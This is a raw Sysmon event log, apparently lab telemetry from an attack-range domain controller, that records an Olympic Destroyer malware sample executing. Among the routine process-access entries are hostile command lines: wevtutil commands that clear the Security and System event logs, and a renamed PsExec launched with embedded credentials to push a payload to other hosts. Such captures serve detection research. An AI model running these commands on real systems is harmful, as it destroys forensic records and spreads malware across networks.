10:56:42.614{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D13561EECEDA025516D624A50332C77,SHA256=7135D45E50A673F26FFD419C6EE0727DC557557CADC907DD057B0A9D7CE4CF0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-12EA-6216-6205-000000003802}5925264C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-6105-000000003802}4408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.616{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.598{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6205-000000003802}592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6205-000000003802}592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7AB93598F0ED971DC9111D5F61362C59,SHA256=D380EE077A783345A07453D69054895E585CA4F78724C16CEA9BCF612B8810FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6105-000000003802}4408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.582{C8EA50B7-12E9-6216-4E05-000000003802}68686944C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe{C8EA50B7-12EA-6216-6105-000000003802}4408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+10af|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+17a7|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+193c|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.581{C8EA50B7-12EA-6216-6105-000000003802}4408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c wevtutil.exe cl SecurityC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe"C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe" 23542300x8000000000000000290276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=287C6DD993E24869E97413A4C7A58C67,SHA256=5853947F4721AB023B5861BB652864A0E0BB17502F882D91EAFE8E25798BCEE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.567{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6105-000000003802}4408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CF5FF1BC43C9E6CDB13565C7524FBCB,SHA256=7780C7D9FAAAEBD9163D24D451E98FFB8D8F7A67769118F20D208331299D7321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.561{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.561{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.561{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.561{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.545{C8EA50B7-12EA-6216-5F05-000000003802}55925112C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-6005-000000003802}6308C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.529{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6005-000000003802}6308C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.529{C8EA50B7-12EA-6216-5E05-000000003802}66884568C:\Windows\system32\cmd.exe{C8EA50B7-12EA-6216-6005-000000003802}6308C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000290266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.532{C8EA50B7-12EA-6216-6005-000000003802}6308C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe cl SystemC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{C8EA50B7-12EA-6216-5E05-000000003802}6688C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl System 10341000x8000000000000000290265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.529{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6005-000000003802}6308C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.514{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 